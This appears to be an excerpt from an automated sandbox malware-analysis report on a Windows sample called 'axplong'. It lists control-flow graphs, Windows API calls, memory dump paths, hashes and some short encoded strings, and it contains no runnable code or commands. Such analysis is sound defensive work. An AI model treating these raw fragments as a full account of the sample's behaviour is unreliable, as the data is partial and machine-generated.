                                                                      control_flow_graph 1003 b27d00-b27d82 call b54020 1007 b27d88-b27db0 call b37870 call b25b20 1003->1007 1008 b2827e-b2829b call b3cf21 1003->1008 1015 b27db2 1007->1015 1016 b27db4-b27dd6 call b37870 call b25b20 1007->1016 1015->1016 1021 b27dda-b27df3 1016->1021 1022 b27dd8 1016->1022 1025 b27e24-b27e4f 1021->1025 1026 b27df5-b27e04 1021->1026 1022->1021 1029 b27e80-b27ea1 1025->1029 1030 b27e51-b27e60 1025->1030 1027 b27e06-b27e14 1026->1027 1028 b27e1a-b27e21 call b3d593 1026->1028 1027->1028 1033 b2829c call b56b9a 1027->1033 1028->1025 1031 b27ea3-b27ea5 GetNativeSystemInfo 1029->1031 1032 b27ea7-b27eac 1029->1032 1035 b27e62-b27e70 1030->1035 1036 b27e76-b27e7d call b3d593 1030->1036 1037 b27ead-b27eb6 1031->1037 1032->1037 1044 b282a1-b282a6 call b56b9a 1033->1044 1035->1033 1035->1036 1036->1029 1042 b27ed4-b27ed7 1037->1042 1043 b27eb8-b27ebf 1037->1043 1048 b2821f-b28222 1042->1048 1049 b27edd-b27ee6 1042->1049 1046 b27ec5-b27ecf 1043->1046 1047 b28279 1043->1047 1051 b28274 1046->1051 1047->1008 1048->1047 1054 b28224-b2822d 1048->1054 1052 b27ee8-b27ef4 1049->1052 1053 b27ef9-b27efc 1049->1053 1051->1047 1052->1051 1056 b27f02-b27f09 1053->1056 1057 b281fc-b281fe 1053->1057 1058 b28254-b28257 1054->1058 1059 b2822f-b28233 1054->1059 1064 b27fe9-b281e5 call b37870 call b25b20 call b37870 call b25b20 call b25c60 call b37870 call b25b20 call b25640 call b37870 call b25b20 call b37870 call b25b20 call b25c60 call b37870 call b25b20 call b25640 call b37870 call b25b20 call b37870 call b25b20 call b25c60 call b37870 call b25b20 call b25640 1056->1064 1065 b27f0f-b27f6b call b37870 call b25b20 call b37870 call b25b20 call b25c60 1056->1065 1062 b28200-b2820a 1057->1062 1063 b2820c-b2820f 1057->1063 1060 b28265-b28271 1058->1060 1061 b28259-b28263 1058->1061 1066 b28235-b2823a 1059->1066 1067 b28248-b28252 1059->1067 1060->1051 1061->1047 1062->1051 1063->1047 1069 b28211-b2821d 1063->1069 1102 b281eb-b281f4 1064->1102 1088 b27f70-b27f77 1065->1088 1066->1067 1071 b2823c-b28246 1066->1071 1067->1047 1069->1051 1071->1047 1090 b27f7b-b27f9b call b58a81 1088->1090 1091 b27f79 1088->1091 1098 b27fd2-b27fd4 1090->1098 1099 b27f9d-b27fac 1090->1099 1091->1090 1101 b27fda-b27fe4 1098->1101 1098->1102 1103 b27fc2-b27fcf call b3d593 1099->1103 1104 b27fae-b27fbc 1099->1104 1101->1102 1102->1048 1106 b281f6 1102->1106 1103->1098 1104->1044 1104->1103 1106->1057
                                                                      APIs
                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B27EA3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true
                                                                      • Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_b20000_axplong.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InfoNativeSystem
                                                                      • String ID: JmpxQb==$JmpxRL==$JmpyPb==
                                                                      • API String ID: 1721193555-2057465332
                                                                      • Opcode ID: 7c14d1ee2dc98400c41b6e3ab08300a734bb2c3765c13ff1ddcdd7f4186b6a0b
                                                                      • Instruction ID: 771af1e45271e58e93c3fd237056b8eb8c0ccb2fc6bdbdb87923a0fbfb1103a3
                                                                      • Opcode Fuzzy Hash: 7c14d1ee2dc98400c41b6e3ab08300a734bb2c3765c13ff1ddcdd7f4186b6a0b
                                                                      • Instruction Fuzzy Hash: 6BD1D870E01668D7DB24BB28EC4B3AD77E1AB45710F5442D8E419AB3D2DF358E818BD2

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1141 b56e01-b56e36 GetFileType 1142 b56e3c-b56e47 1141->1142 1143 b56eee-b56ef1 1141->1143 1146 b56e69-b56e85 call b54020 GetFileInformationByHandle 1142->1146 1147 b56e49-b56e5a call b57177 1142->1147 1144 b56ef3-b56ef6 1143->1144 1145 b56f1a-b56f42 1143->1145 1144->1145 1148 b56ef8-b56efa 1144->1148 1150 b56f44-b56f57 1145->1150 1151 b56f5f-b56f61 1145->1151 1155 b56f0b-b56f18 call b5740d 1146->1155 1162 b56e8b-b56ecd call b570c9 call b56f71 * 3 1146->1162 1158 b56f07-b56f09 1147->1158 1159 b56e60-b56e67 1147->1159 1154 b56efc-b56f01 call b57443 1148->1154 1148->1155 1150->1151 1164 b56f59-b56f5c 1150->1164 1153 b56f62-b56f70 call b3cf21 1151->1153 1154->1158 1155->1158 1158->1153 1159->1146 1177 b56ed2-b56eea call b57096 1162->1177 1164->1151 1177->1151 1180 b56eec 1177->1180 1180->1158
                                                                      APIs
                                                                      • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00B56E23
                                                                      • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00B56E7D
                                                                      • __dosmaperr.LIBCMT ref: 00B56F12
                                                                        • Part of subcall function 00B57177: __dosmaperr.LIBCMT ref: 00B571AC
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true
                                                                      • Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_b20000_axplong.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File__dosmaperr$HandleInformationType
                                                                      • String ID:
                                                                      • API String ID: 2531987475-0
                                                                      • Opcode ID: f097fefc20154781fd85dff28f12c0350bfad8033a31c314c4d64e5fdb60693d
                                                                      • Instruction ID: 1737f4ba9fd53f61c6cf5424fecd0b1003009afe9b026873f7ec21c590e8d9d2
                                                                      • Opcode Fuzzy Hash: f097fefc20154781fd85dff28f12c0350bfad8033a31c314c4d64e5fdb60693d
                                                                      • Instruction Fuzzy Hash: A2416D75D00304AECB24EFB5E845AAFBBF9EF49301B1044ADF856D7210EA319808CB21

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1300 b282b0-b28331 call b54020 1304 b28333-b28338 1300->1304 1305 b2833d-b28365 call b37870 call b25b20 1300->1305 1306 b2847f-b2849b call b3cf21 1304->1306 1313 b28367 1305->1313 1314 b28369-b2838b call b37870 call b25b20 1305->1314 1313->1314 1319 b2838f-b283a8 1314->1319 1320 b2838d 1314->1320 1323 b283aa-b283b9 1319->1323 1324 b283d9-b28404 1319->1324 1320->1319 1325 b283bb-b283c9 1323->1325 1326 b283cf-b283d6 call b3d593 1323->1326 1327 b28431-b28452 1324->1327 1328 b28406-b28415 1324->1328 1325->1326 1333 b2849c-b284a1 call b56b9a 1325->1333 1326->1324 1331 b28454-b28456 GetNativeSystemInfo 1327->1331 1332 b28458-b2845d 1327->1332 1329 b28427-b2842e call b3d593 1328->1329 1330 b28417-b28425 1328->1330 1329->1327 1330->1329 1330->1333 1337 b2845e-b28465 1331->1337 1332->1337 1337->1306 1342 b28467-b2846f 1337->1342 1343 b28471-b28476 1342->1343 1344 b28478-b2847b 1342->1344 1343->1306 1344->1306 1345 b2847d 1344->1345 1345->1306
                                                                      APIs
                                                                      • GetNativeSystemInfo.KERNELBASE(?), ref: 00B28454
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true
                                                                      • Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_b20000_axplong.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InfoNativeSystem
                                                                      • String ID:
                                                                      • API String ID: 1721193555-0
                                                                      • Opcode ID: 25199b6e89032dfe23f93d9a6c9384f9b3f99eae8dfda5c32aa360057c2da24b
                                                                      • Instruction ID: e8ed1cdb30d6c29376f674faccbb0285a984d1567b50cc8aaaec83d2d917423a
                                                                      • Opcode Fuzzy Hash: 25199b6e89032dfe23f93d9a6c9384f9b3f99eae8dfda5c32aa360057c2da24b
                                                                      • Instruction Fuzzy Hash: 04511870D012289BEB24EB68ED897EDB7F5DB45310F5042D8E818A73D1EF359A80CB95

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1346 b56c99-b56ca5 1347 b56cc4-b56ce8 call b54020 1346->1347 1348 b56ca7-b56cc3 call b57430 call b57443 call b56b8a 1346->1348 1353 b56d06-b56d28 CreateFileW 1347->1353 1354 b56cea-b56d04 call b57430 call b57443 call b56b8a 1347->1354 1357 b56d38-b56d3f call b56d77 1353->1357 1358 b56d2a-b56d2e call b56e01 1353->1358 1378 b56d72-b56d76 1354->1378 1368 b56d40-b56d42 1357->1368 1367 b56d33-b56d36 1358->1367 1367->1368 1370 b56d64-b56d67 1368->1370 1371 b56d44-b56d61 call b54020 1368->1371 1374 b56d70 1370->1374 1375 b56d69-b56d6f 1370->1375 1371->1370 1374->1378 1375->1374
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true
                                                                      • Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_b20000_axplong.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9c3a93cd6b033946dacc36d309f936c52a645f8559652b83c153fb79f392cd77
                                                                      • Instruction ID: b6f82432ecc804c468e66a9d200bf3e8d4964c995d4e3061caec5effccf18a32
                                                                      • Opcode Fuzzy Hash: 9c3a93cd6b033946dacc36d309f936c52a645f8559652b83c153fb79f392cd77
                                                                      • Instruction Fuzzy Hash: 2A21D872A052086AEB117B649C42B9F37A9DF4133AF6007E0FD342B2D1DBB05E0996A1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1380 b56f71-b56f87 1381 b56f97-b56fa7 1380->1381 1382 b56f89-b56f8d 1380->1382 1386 b56fe7-b56fea 1381->1386 1387 b56fa9-b56fbb SystemTimeToTzSpecificLocalTime 1381->1387 1382->1381 1383 b56f8f-b56f95 1382->1383 1384 b56fec-b56ff7 call b3cf21 1383->1384 1386->1384 1387->1386 1389 b56fbd-b56fdd call b56ff8 1387->1389 1392 b56fe2-b56fe5 1389->1392 1392->1384
                                                                      APIs
                                                                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00B56FB3
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true
                                                                      • Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_b20000_axplong.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Time$LocalSpecificSystem
                                                                      • String ID:
                                                                      • API String ID: 2574697306-0
                                                                      • Opcode ID: ea4a06a9a084f8932c150a6707fb76c6bd0da1bdc514b61b66b3ec6444e6f59f
                                                                      • Instruction ID: 7fba958c43a97adb0df7939648e844f83aca88086af412be74330ecd27c4d5fc
                                                                      • Opcode Fuzzy Hash: ea4a06a9a084f8932c150a6707fb76c6bd0da1bdc514b61b66b3ec6444e6f59f
                                                                      • Instruction Fuzzy Hash: 2211DD7290020CAACB14DE95D984EDFB7FCAB08315F5052A6E911E7180EB31EB48CB61

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true
                                                                      • Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_b20000_axplong.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: cb4d7bcd69a68a2fb22edbf3edfef477d1f1604bb1ee22c824aa2dfda6b67045
                                                                      • Instruction ID: 0d59643a25fcc3443f44e016fdd57fe1e06ae5345aa0df7012a6a438cd23051a
                                                                      • Opcode Fuzzy Hash: cb4d7bcd69a68a2fb22edbf3edfef477d1f1604bb1ee22c824aa2dfda6b67045
                                                                      • Instruction Fuzzy Hash: 56F08171A40618ABC610BB699D07B1EBBE5AB06B60F900398E815672F1DB345A008BD2

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1497 53c02cb-53c036b 1503 53c0372-53c03b9 1497->1503
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.3000705965.00000000053C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_53c0000_axplong.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0bcbdae73ec87f119778b8fb6dbb8b8fbb42985f598cbf40fb8b84d1e7b57eea
                                                                      • Instruction ID: 361f90e3c999828bc9a08e66978fe3c9215f8e75a1698f720c44eb1cf8753e83
                                                                      • Opcode Fuzzy Hash: 0bcbdae73ec87f119778b8fb6dbb8b8fbb42985f598cbf40fb8b84d1e7b57eea
                                                                      • Instruction Fuzzy Hash: 79017CFB14C160FE7046C1C12B189FE6B6EE1D3230330C5ABF806C5842D2950E496332

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1506 53c02cd-53c036b 1512 53c0372-53c03b9 1506->1512
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.3000705965.00000000053C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_53c0000_axplong.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8b56c7148cd2243895765b9b59a4a1eddf40d1e5ce27da0ed1c6725f03fc098f
                                                                      • Instruction ID: cd45fb1155a48acc4862db58174d823ee928dd9169cd88f57225fd5ca696ec51
                                                                      • Opcode Fuzzy Hash: 8b56c7148cd2243895765b9b59a4a1eddf40d1e5ce27da0ed1c6725f03fc098f
                                                                      • Instruction Fuzzy Hash: 63017CFB14C160FE7046C1C12B189FE6B6EE1D2230330C5ABF806C5842D2940E496332
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.3000705965.00000000053C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_53c0000_axplong.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0e6838fadc33ea80424de5a565506a876f4ca6b3be2af2447fa0b4b987fcb14c
                                                                      • Instruction ID: 4653a00c4878c783a08387b1b2b4d152519bf4ce2548e7ae21c9c791ef91a1db
                                                                      • Opcode Fuzzy Hash: 0e6838fadc33ea80424de5a565506a876f4ca6b3be2af2447fa0b4b987fcb14c
                                                                      • Instruction Fuzzy Hash: 29F0E9EB04C550EF6086D1E15B596FE6F5EE2E373023485ABF447D298291840E895332
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.3000705965.00000000053C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_53c0000_axplong.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 615f382e9cf111c7ee0b2362e99324e672acb9868ffe891e86756db29b254017
                                                                      • Instruction ID: 610801d3c580c4c33adb3ee31b2bcb8fbff19e53b0481e66cb85ac33af396b6d
                                                                      • Opcode Fuzzy Hash: 615f382e9cf111c7ee0b2362e99324e672acb9868ffe891e86756db29b254017
                                                                      • Instruction Fuzzy Hash: A6F0ECAB19D5A0DF644AD1E1174D7FE5F5FB0D353037441ABF00784D82D1844E5D5761
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.3000705965.00000000053C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_53c0000_axplong.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 81cd69628992834884e3ac5c92cc39ad17e720fa6e18fbaa3c57e6c18bbc57dc
                                                                      • Instruction ID: 3856c5ceaf869aa10a9255bb3969612421494a7e31bde72e3b9d3d1837d82c23
                                                                      • Opcode Fuzzy Hash: 81cd69628992834884e3ac5c92cc39ad17e720fa6e18fbaa3c57e6c18bbc57dc
                                                                      • Instruction Fuzzy Hash: C2F082E715CA90DF9192C2D15A9D6FA7FBAB6D323033441EFE48296482D2540E299B32
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.3000705965.00000000053C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_53c0000_axplong.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 64353d8081d87acb9983daec6cea71c82912f60cd0992beefcbc27d525303272
                                                                      • Instruction ID: d7344ab3c42206f1d8b6d44463787e4cea87b51fcf82774a3f1ecde0952c40b0
                                                                      • Opcode Fuzzy Hash: 64353d8081d87acb9983daec6cea71c82912f60cd0992beefcbc27d525303272
                                                                      • Instruction Fuzzy Hash: EEE09AA714C550EEA195D2E2274C6BDAB6DB0D723133481BBE45286982E2850F5E6332
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.3000705965.00000000053C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_53c0000_axplong.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 712262acad8c8dc31e7e719c5d5da1f9db2606c28a2541b8420ac75264b0d0e1
                                                                      • Instruction ID: 6a337ca2fefe93a7a62aaf810920c44b4cc5480bac6a24f0542418493508bf8f
                                                                      • Opcode Fuzzy Hash: 712262acad8c8dc31e7e719c5d5da1f9db2606c28a2541b8420ac75264b0d0e1
                                                                      • Instruction Fuzzy Hash: 5BD05EAB08C520EE7085D2D12A0DAFEAA7DF0D327133080BBF842D0482E5844E2E6232
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true
                                                                      • Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
